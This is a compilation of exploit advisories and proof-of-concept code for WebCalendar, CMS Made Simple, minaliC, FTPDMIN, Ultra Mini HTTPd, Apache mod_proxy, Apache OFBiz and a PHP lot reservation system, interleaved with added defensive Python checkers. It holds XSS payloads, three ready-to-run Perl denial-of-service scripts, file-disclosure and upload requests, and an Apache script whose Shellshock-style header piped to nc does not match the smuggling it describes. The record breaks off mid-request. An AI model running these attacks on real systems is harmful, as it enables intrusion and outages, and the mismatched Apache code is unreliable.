<pre><code># Exploit Title: WebCalendar 1.3.0 - Stored XSS / Reflected XSS<br /># Date: 2024-3-1<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: http://www.k5n.us/webcalendar.php<br /># Version: 1.3.0<br /># Tested on: https://www.softaculous.com/apps/calendars/WebCalendar<br /><br />## Stored XSS<br /><br />1 ) Go to Events > Add New Events > Brief Description : https://demos2.softaculous.com/WebCalendarvqsmnseug2/edit_entry.php?year=2024&month=01&day=03<br />    and enter this payload : <sVg/onLy=1 onLoaD=confirm(1)//<br />2 ) The alert box appears when the month view is opened : https://demos2.softaculous.com/WebCalendarvqsmnseug2/month.php<br /><br /><br />=============================================================================================<br /><br />## Reflected XSS (colors.php, color parameter)<br /><br />1 ) Go to this URL, which carries the payload in the color parameter : https://demos2.softaculous.com/WebCalendarvqsmnseug2/colors.php?color="><sVg/onLy=1 onLoaD=confirm(1)//<br />    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//<br />2 ) The alert box appears<br /><br /><br />==============================================================================================<br /><br />## Reflected XSS (availability.php, users parameter)<br /><br />1 ) Go to this URL and place the payload in the users parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=admin&form=editentryform&year=2024&month=1&day=3<br />    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//<br />2 ) The alert box appears : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&form=editentryform&year=2024&month=1&day=3<br /><br />==============================================================================================<br /><br />## Reflected XSS (datesel.php, fday parameter)<br /><br />1 ) Go to this URL and place the payload in the fday parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year%27&date=20240201<br />    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//<br />2 ) The alert box appears : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&fmonth=rpt_month&fyear=rpt_year%27&date=20240201<br /><br /><br />===============================================================================================<br /></code></pre>
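Added example, not part of the advisory above and not WebCalendar's own code: every case listed comes down to a query parameter being written back into HTML without encoding. The Python below renders the `color` parameter the vulnerable way and the hardened way (attribute-context escaping with `html.escape`), then audits each rendering with the standard library's `HTMLParser` to report any tag or `on*` attribute the template did not intend. The advisory's payload is used as constructed input, and the percent-encoded form from the PoC URLs is decoded first, as the server would do; all function and class names are mine.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample: the payload the advisory reports against the color, users and fday parameters
SAMPLE_PAYLOAD = '"><sVg/onLy=1 onLoaD=confirm(1)//'
SAMPLE_ENCODED = '%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//'


def decode_query_value(value: str) -> str:
    """Percent-decode a query-string value the way the server sees it."""
    return unquote(value)


def render_color_field_unsafe(color: str) -> str:
    """Vulnerable rendering: the parameter is inserted into an attribute verbatim."""
    return f'<input type="text" name="color" value="{color}">'


def render_color_field_safe(color: str) -> str:
    """Hardened rendering: escape for the attribute context (quote=True also escapes ' and ")."""
    return f'<input type="text" name="color" value="{html.escape(color, quote=True)}">'


class TagCollector(HTMLParser):
    """Records every start tag and every event-handler attribute a browser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.event_handlers.append((tag, name))


def audit_rendered_html(rendered: str, allowed_tags=("input",)) -> dict:
    """Parse the rendered fragment and report injected tags and on* attributes."""
    collector = TagCollector()
    collector.feed(rendered)
    collector.close()
    return {
        "unexpected_tags": [t for t in collector.tags if t not in allowed_tags],
        "event_handlers": collector.event_handlers,
    }


def is_rendering_safe(rendered: str) -> bool:
    """True when only the intended tag is present and no event handler was injected."""
    report = audit_rendered_html(rendered)
    return not report["unexpected_tags"] and not report["event_handlers"]


if __name__ == "__main__":
    payload = decode_query_value(SAMPLE_ENCODED)
    for label, renderer in (("unsafe", render_color_field_unsafe), ("safe", render_color_field_safe)):
        out = renderer(payload)
        print(f"{label}: {out}")
        print("   ", audit_rendered_html(out))
```

The audit is deliberately run on the rendered output rather than on the input: input filtering misses encodings and tag variants, while parsing the response the way a browser does shows whether an `svg` element with an `onload` handler actually reached the page. The same audit can be pointed at responses captured while testing the stored case in `month.php`.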
<pre><code>## Title: cmsms-2.2.19 - File Upload - RCE<br />## Author: nu11secur1ty<br />## Date: 12/29/2023<br />## Vendor: https://www.cmsmadesimple.org/<br />## Software: https://www.cmsmadesimple.org/downloads-header/cmsms/<br />## Reference: https://portswigger.net/web-security/file-upload,<br />https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload<br /><br />## Description:<br />The parameter "fileupload" in type ID is vulnerable to File Upload and<br />RCE attacks; it is not sanitized correctly. The attacker can upload a<br />virus directly on the server by using this web vulnerability, and then<br />he can execute it; this can be the end of this server depending on the<br />scenario! In this case, I just uploaded a [WebSocket] connector,<br />exploit.html, to connect the server with my machine; this is so nasty.<br />I am a Penetration Tester, not a stupid cracker! Thank you all!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Exploit execution:<br /><br />```<br />curl https://pwnedhost.com/uploads/exploit.html<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/cmsmadesimple.org/2023/CMSMS%E2%84%A2-2.2.19)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/12/cmsms-2219-file-upload-rce.html)<br /><br />## Time spent:<br />00:35:00<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use Socket;<br /><br /># Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 03 January 2024<br /># Vendor Homepage: http://minalic.sourceforge.net/<br /># Download to demo: https://drive.google.com/file/d/1WoDbps6up2s5Xa40YXDSABRU9J17yRQd/view?usp=sharing<br /># Notification vendor: Not reported<br /># Tested Version: minaliC 2.0.0<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: https://www.youtube.com/watch?v=R_gkEjvpJNw<br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server does not properly handle requests carrying large amounts of data sent to the web server via the GET method.<br />#The following request sends a large amount of data to the web server through the GET method; the server crashes as soon as the request is received and processed, causing a denial of service condition.<br />#Successful exploitation of this issue allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> # Clear the terminal; $^O reports "MSWin32" on Windows, never "windows"<br /> $sis="$^O";<br /><br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /><br /> intro();<br /> main();   # sets $ip and $port from the command line<br /><br /> print "[+] Exploiting... \n";<br /><br /># Oversized request path and Host header value<br />my $junk = "\x41" x 245;<br /><br />my $host = "\x41" x 135;<br />my $i=0;<br />while ($i <= 3) {<br />my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";<br /><br />my $sock;<br />socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";<br /><br />my $addr = sockaddr_in($port, inet_aton($ip));<br />connect($sock, $addr) or die "[-] Could not connect to $ip port $port: $!\n";<br /><br />send($sock, $buf, length($buf), 0);<br />close($sock);<br /><br />$i++;<br /><br />}<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /><br /> sub intro {<br /> print "***************************************************\n";<br /> print "* minaliC 2.0.0 - Denial of Service *\n";<br /> print "* *\n";<br /> print "* Coded by Fernando Mengali *\n";<br /> print "* *\n";<br /> print "* e-mail: fernando.mengalli\@gmail.com *\n";<br /> print "* *\n";<br /> print "***************************************************\n";<br /> }<br /><br /> sub main {<br /><br /> # Package globals, so the PoC body above can use them after main() returns<br /> our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This product version is deprecated.<br /></code></pre>
<pre><code># Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through<br /># 2.4.55 allow an HTTP Request Smuggling attack. Configurations are affected<br /># when mod_proxy is enabled along with some form of RewriteRule or<br /># ProxyPassMatch in which a non-specific pattern matches some portion of the<br /># user-supplied request-target (URL) data and is then re-inserted into the<br /># proxied request-target using variable substitution. For example, something<br /># like:<br />#<br />#   RewriteEngine on<br />#   RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1" [P]<br />#   ProxyPassReverse /here/ http://example.com:8080/<br />#<br /># Request splitting/smuggling could result in bypass of access controls in<br /># the proxy server, proxying unintended URLs to existing origin servers, and<br /># cache poisoning. Users are recommended to update to at least version<br /># 2.4.56 of Apache HTTP Server.<br /><br />import requests<br /><br /><br />def send_exploit(proxy_url):<br />    # Sends a single GET for a request-target containing "/../" through the<br />    # given HTTP proxy, with a crafted User-Agent header, and prints the<br />    # status and body so the proxied result can be inspected.<br />    exploit_headers = {<br />        'User-Agent': '() { :; }; /bin/echo -e "GET /here/../here HTTP/1.1\r\nHost: www.example.com\r\n\r\nGET /nonexistent HTTP/1.1\r\nHost: www.example.com\r\n\r\n" | nc example.com 80',<br />        'Connection': 'close'<br />    }<br /><br />    exploit_url = 'http://example.com/here/../here'<br />    response = requests.get(exploit_url, headers=exploit_headers, proxies={'http': proxy_url, 'https': proxy_url})<br /><br />    print(response.status_code)<br />    print(response.text)<br /><br /><br /># Usage<br />if __name__ == '__main__':<br />    send_exploit('http://localhost:8080')<br /></code></pre>
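Added example, not from the advisory above: a configuration check rather than an exploit, for the shape the description names, namely a RewriteRule with the P (proxy) flag or a ProxyPassMatch whose substitution re-inserts a captured piece of the request-target through $1..$9. The httpd.conf fragment is constructed and the function names are mine. A hit only means the risky shape is present; the fix the advisory gives is updating to 2.4.56 or later.

```python
import re
from typing import List, Tuple

# $1..$9 in a substitution re-inserts part of the client-supplied request-target
BACKREF = re.compile(r"\$[1-9]")

REWRITE_RULE = re.compile(
    r'^\s*RewriteRule\s+(?P<pattern>"[^"]*"|\S+)\s+(?P<subst>"[^"]*"|\S+)'
    r'(?:\s+\[(?P<flags>[^\]]*)\])?',
    re.IGNORECASE,
)
PROXY_PASS_MATCH = re.compile(
    r'^\s*ProxyPassMatch\s+(?P<pattern>"[^"]*"|\S+)\s+(?P<target>"[^"]*"|\S+)',
    re.IGNORECASE,
)

# Constructed httpd.conf fragment; line 3 is the advisory's own example
SAMPLE_CONFIG = """\
RewriteEngine on
# Risky: unanchored capture re-inserted into the proxied request-target
RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1" [P]
ProxyPassReverse /here/ http://example.com:8080/
# Proxy rule with a fixed target: nothing from the request is substituted
RewriteRule "^/static/" "http://example.com:8080/static/" [P,L]
# Not a proxy rule at all
RewriteRule "^/old/(.*)" "/new/$1" [R=301,L]
ProxyPassMatch "^/api/(.*)$" "http://backend:9000/api/$1"
ProxyPass /legacy/ http://backend:9000/legacy/
"""


def _is_proxy_rule(flags: str) -> bool:
    """True when the RewriteRule flag list contains P or proxy."""
    return any(f.strip().upper() in ("P", "PROXY") for f in flags.split(","))


def risky_directives(config_text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, directive, reason) for proxy rules that substitute request data."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = REWRITE_RULE.match(line)
        if m:
            if _is_proxy_rule(m.group("flags") or "") and BACKREF.search(m.group("subst")):
                findings.append((lineno, "RewriteRule",
                                 "proxy rule substitutes captured request-target data into the proxied URL"))
            continue
        m = PROXY_PASS_MATCH.match(line)
        if m and BACKREF.search(m.group("target")):
            findings.append((lineno, "ProxyPassMatch",
                             "target substitutes captured request-target data into the proxied URL"))
    return findings


if __name__ == "__main__":
    for lineno, directive, reason in risky_directives(SAMPLE_CONFIG):
        print(f"line {lineno}: {directive}: {reason}")
```

The check is line-oriented and ignores directives split with backslash continuations or generated by Include files; run it over the fully expanded configuration if the server uses either.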
<pre><code>#!/usr/bin/perl<br /><br />use Net::FTP;<br /><br /># Exploit Title: FTPDMIN 0.96 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 2024-01-01<br /># Vendor Homepage: https://www.sentex.ca/~mwandel/ftpdmin/<br /># Download to demo: https://drive.google.com/file/d/1CpfvaJbJVxR3HPWvcxIVipTaTj7RAaLd/view?usp=sharing<br /># Notification vendor: Yes reported<br /># Tested Version: FTPDMIN 0.96<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: https://www.youtube.com/watch?v=q-CVJfYdd-g<br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server does not properly handle requests carrying large amounts of data sent via the FTP command RNFR.<br />#The following request sends a large amount of data to the FTP server through the RNFR command; the server crashes as soon as the request is received and processed, causing a denial of service condition.<br />#Successful exploitation of this issue allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> # Clear the terminal; $^O reports "MSWin32" on Windows, never "windows"<br /> $sis="$^O";<br /><br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /><br /> intro();<br /> main();   # sets $ip from the command line<br /><br /> print "[+] Exploiting... \n";<br /><br /> # Oversized RNFR argument<br /> my $buf = "\x41"x269;<br /> my $point = "\x45\x2a\x42\x7b";<br /> my $buf2 = "\x41"x126;<br /><br /> my $payload = "RNFR ".$buf . $point . $buf2;<br /><br /> my $ftp = Net::FTP->new($ip, Debug => 0) or die "Can't connect to server: $@";<br /><br /> $ftp->login("anonymous",'anonymous') or die "Cannot login: ", $ftp->message;<br /><br /> # Send the raw command; the server is expected to crash while processing it<br /> $ftp->quot($payload);<br /><br /> $ftp->quit;<br /><br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /><br /> sub intro {<br /> print "***************************************************\n";<br /> print "* FTPDMIN 0.96 - Denial of Service *\n";<br /> print "* *\n";<br /> print "* Coded by Fernando Mengali *\n";<br /> print "* *\n";<br /> print "* e-mail: fernando.mengalli\@gmail.com *\n";<br /> print "* *\n";<br /> print "***************************************************\n";<br /> }<br /><br /> sub main {<br /><br /> # Package global, so the PoC body above can use it after main() returns<br /> our ($ip) = @ARGV;<br /><br /> unless (defined($ip)) {<br /><br /> print " \nUsage: $0 <ip> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This product version is deprecated.<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: Ultra Mini HTTPd 1.21 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 2024-01-01<br /># Vendor Homepage: https://acme.com/<br /># Software Link: https://acme.com/<br /># Notification vendor: Yes reported<br /># Tested Version: Ultra Mini HTTPd 1.21<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: https://www.youtube.com/watch?v=HWOGeg3e5As<br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server does not properly handle requests carrying large amounts of data sent via GET.<br />#The following request sends a large amount of data to the web server; the server crashes as soon as the request is received and processed, causing a denial of service condition.<br />#Successful exploitation of this issue allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> # Clear the terminal; $^O reports "MSWin32" on Windows, never "windows"<br /> $sis="$^O";<br /><br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /><br /> intro();<br /> main();   # sets $ip and $port from the command line<br /><br /> print "[+] Exploiting... \n";<br /><br /> my $buffer = "\x41"x192;<br /><br /> # Oversized request-target: 5438 bytes of 'A' followed by the 192-byte buffer<br /> my $payload = 'A' x 5438 . $buffer;<br /> my $i=0;<br /> while ($i < 1) {<br /><br /> my $socket = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp',<br /> ) or die "Can't connect!!!!! \n\n";<br /> my $request = "GET / $payload HTTP/1.1\r\nHost:$ip\r\n\r\n";<br /> $socket->send($request);<br /> close($socket);<br /> $i++;<br /> }<br /><br /> print "[+] Exploited success!!!!!\n\n";<br /><br /> sub intro {<br /> print "***************************************************\n";<br /> print "* Ultra Mini HTTPd 1.21 - Denial of Service *\n";<br /> print "* *\n";<br /> print "* Coded by Fernando Mengali *\n";<br /> print "* *\n";<br /> print "* e-mail: fernando.mengalli\@gmail.com *\n";<br /> print "* *\n";<br /> print "***************************************************\n";<br /> }<br /><br /> sub main {<br /><br /> # Package globals, so the PoC body above can use them after main() returns<br /> our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This product version is deprecated.<br /></code></pre>
<pre><code>From: Jacques Le Roux <jleroux () apache org><br />Date: Mon, 04 Dec 2023 21:04:50 +0000<br /><br />Severity: moderate<br /><br />Affected versions:<br /><br />- Apache OFBiz before 18.12.10<br /><br />Description:<br /><br />Pre-auth RCE in Apache OFBiz 18.12.09.<br /><br />It is due to XML-RPC, which is no longer maintained but is still present.<br />This issue affects Apache OFBiz: before 18.12.10.<br />Users are recommended to upgrade to version 18.12.10.<br /><br />This issue is being tracked as OFBIZ-12812<br /><br />Credit:<br /><br />Siebene@ (finder)<br /><br />References:<br /><br />https://ofbiz.apache.org/download.html<br />https://ofbiz.apache.org/security.html<br />https://ofbiz.apache.org/release-notes-18.12.10.html<br />https://ofbiz.apache.org/<br />https://www.cve.org/CVERecord?id=CVE-2023-49070<br />https://issues.apache.org/jira/browse/OFBIZ-12812<br /><br /><br />-----<br />Packet Storm Note<br />Below is the proof of concept circulating on Twitter:<br /><br />#POC:<br />/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y<br /></code></pre>
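Added example, not part of the announcement or of the Packet Storm note: a detector that reads web-server access log lines and flags the request shape of the quoted PoC, namely a hit on the xmlrpc controller, a ';' path-parameter segment in the path, requirePasswordChange=Y in the query, and an empty USERNAME sent together with a PASSWORD. The log lines are constructed and the function names are mine; the durable fix remains the upgrade to 18.12.10.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Common Log Format: client ident authuser [time] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

XMLRPC_ENDPOINT = "request to the XML-RPC controller"
PATH_PARAM = "';' path-parameter segment in the request path"
PASSWORD_CHANGE = "requirePasswordChange=Y in the query string"
EMPTY_USERNAME = "empty USERNAME sent together with a PASSWORD"

# Constructed sample log; line 2 is the PoC URL from the Packet Storm note
SAMPLE_LOG = """\
10.0.0.5 - - [04/Dec/2023:21:10:01 +0000] "GET /webtools/control/main HTTP/1.1" 200 5123
10.0.0.9 - - [04/Dec/2023:21:10:07 +0000] "POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 412
10.0.0.9 - - [04/Dec/2023:21:10:09 +0000] "POST /webtools/control/xmlrpc HTTP/1.1" 403 0
10.0.0.7 - - [04/Dec/2023:21:11:00 +0000] "GET /control/login?USERNAME=admin&PASSWORD=x HTTP/1.1" 200 3001
"""


def request_findings(target: str) -> list:
    """Return the reasons a request-target looks like the PoC shape (empty list if none)."""
    parts = urlsplit(target)          # urlsplit keeps ';' inside the path
    path = parts.path
    findings = []
    if re.search(r"/xmlrpc(;|/|$)", path, re.IGNORECASE):
        findings.append(XMLRPC_ENDPOINT)
        if ";" in path:
            findings.append(PATH_PARAM)
    query = parse_qs(parts.query, keep_blank_values=True)
    if query.get("requirePasswordChange", [""])[0].upper() == "Y":
        findings.append(PASSWORD_CHANGE)
    if query.get("USERNAME") == [""] and "PASSWORD" in query:
        findings.append(EMPTY_USERNAME)
    return findings


def scan_access_log(log_text: str) -> list:
    """Parse each log line and keep the ones with at least one finding."""
    flagged = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = request_findings(m.group("target"))
        if findings:
            flagged.append({
                "client": m.group("client"),
                "target": m.group("target"),
                "status": int(m.group("status")),
                "findings": findings,
            })
    return flagged


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["target"])
        for reason in hit["findings"]:
            print("   ", reason)
```

A 200 on the xmlrpc controller with several findings on one line is the case to triage first; a lone hit on the endpoint that was refused with 403 is worth knowing about but is not by itself evidence of success.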
<pre><code># Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability<br /># Google Dork: N/A<br /># Date: 10th December 2023<br /># Exploit Author: Elijah Mandila Syoyi<br /># Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip<br /># Version: 1.0<br /># Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0<br /># CVE : N/A<br /><br />Developer description about application purpose:-<br /><br />------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />About<br /><br />The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. 
The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.<br /><br />------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />Vulnerability:-<br /><br />The application is vulnerable to PHP source code disclosure. An attacker can abuse it to read sensitive PHP files within the application and also outside the web root. The php://filter stream wrapper with the convert.base64-encode filter is used in this scenario, so the requested file comes back base64-encoded instead of being executed.<br /><br /><br /><br />Proof of Concept:-<br /><br />(HTTP Request)<br /><br />GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1<br />Host: 192.168.150.228<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer: http://192.168.150.228/lot/<br />Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9sn<br />Upgrade-Insecure-Requests: 1<br /><br /><br />The same can be achieved without the PHPSESSID cookie, as below:-<br /><br /><br />GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1<br />Host: 192.168.150.228<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer: http://192.168.150.228/lot/<br />Upgrade-Insecure-Requests: 1<br /><br /><br /><br />The requested file is returned base64-encoded in the HTTP response.<br /><br />The attack can also be used to traverse directories and return files outside the web root.<br /><br /><br /><br />GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1<br />Host: 192.168.150.228<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer: http://192.168.150.228/lot/<br />Upgrade-Insecure-Requests: 1<br /><br /><br />This returns the file test.php from the D:\ directory.<br /></code></pre>
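Added example, not part of the advisory and not the application's code: the disclosure works because the `page` parameter reaches an include with a stream wrapper in it. The Python below does two things a defender wants at that spot: it parses a `php://filter` value into its filter chain and target resource (useful when triaging logs), and it shows a hardened resolver that maps the parameter to a template only through an allowlist, refusing any `scheme://` wrapper, path separators, `..` and NUL bytes. The allowlist of page names is an assumption for the example, not the application's own; the function names are mine.

```python
import re
from urllib.parse import unquote

# Hypothetical allowlist of templates index.php may include (an assumption, not the app's own list)
ALLOWED_PAGES = {"home", "about", "lots", "reservation"}

# Anything of the form scheme:// is a stream wrapper (php://, file://, data://, phar://, ...)
WRAPPER_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# php://filter/<filter>[/<filter>...]/resource=<target>
PHP_FILTER_RE = re.compile(
    r"^php://filter/(?P<chain>.*?)/?resource=(?P<resource>.*)$",
    re.IGNORECASE | re.DOTALL,
)


def parse_php_filter(page_param: str):
    """Split a php://filter value into its filter chain and target resource, or None."""
    m = PHP_FILTER_RE.match(unquote(page_param))
    if not m:
        return None
    return {
        "filters": [f for f in m.group("chain").split("/") if f],
        "resource": m.group("resource"),
    }


def is_wrapper_probe(page_param: str) -> bool:
    """True when the (percent-decoded) value starts with a stream-wrapper scheme."""
    return WRAPPER_RE.match(unquote(page_param)) is not None


def resolve_page(page_param: str):
    """Map the page parameter to a template file name, or None when it must be rejected."""
    value = unquote(page_param)
    if WRAPPER_RE.match(value):
        return None
    if "\x00" in value or ".." in value or "/" in value or "\\" in value:
        return None
    if value not in ALLOWED_PAGES:
        return None
    return f"{value}.php"


if __name__ == "__main__":
    for candidate in ("home", "admin/db_connect",
                      "php://filter/convert.base64-encode/resource=admin/db_connect"):
        print(candidate, "->", resolve_page(candidate), parse_php_filter(candidate))
```

The allowlist is the actual control; the wrapper and traversal checks in front of it only exist so that a rejected value is logged with a precise reason. `parse_php_filter` is what turns a flagged request into something readable in an incident timeline: which filter was applied and which file was asked for.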
<pre><code># Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution<br /># Google Dork: N/A<br /># Date: 10th December 2023<br /># Exploit Author: Elijah Mandila Syoyi<br /># Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip<br /># Version: 1.0<br /># Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0<br /># CVE : N/A<br /><br />Developer description about application purpose:-<br /><br />------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />About<br /><br />The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. 
The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.<br /><br />------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />Vulnerability:-<br /><br />The application does not properly verify authentication information or file types before a file is uploaded. This allows an attacker to bypass authentication and file-type checking and upload a malicious file to the server. The directory where uploaded files are stored has open directory listing, so an attacker can locate the uploaded PHP file and request it, and the server executes it.<br /><br /><br /><br />Proof of Concept:-<br /><br />(HTTP POST Request)<br /><br />POST /lot/admin/ajax.php?action=save_division HTTP/1.1<br />Host: 192.168.150.228<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027<br />Content-Length: 606<br />Origin: http://192.168.150.228<br />Connection: close<br />Referer: http://192.168.150.228/lot/admin/index.php?page=divisions<br /><br /><br />-----------------------------217984066236596965684247013027<br />Content-Disposition: form-data; name="id"<br /><br /><br />-----------------------------217984066236596965684247013027<br />Content-Disposition: form-data; name="name"<br /><br />sample<br />-----------------------------217984066236596965684247013027<br />Content-Disposition: form-data; name="description"<br /><br />sample<br />-----------------------------217984066236596965684247013027<br />Content-Disposition: form-data; name="img"; filename="phpinfo.php"<br />Content-Type: 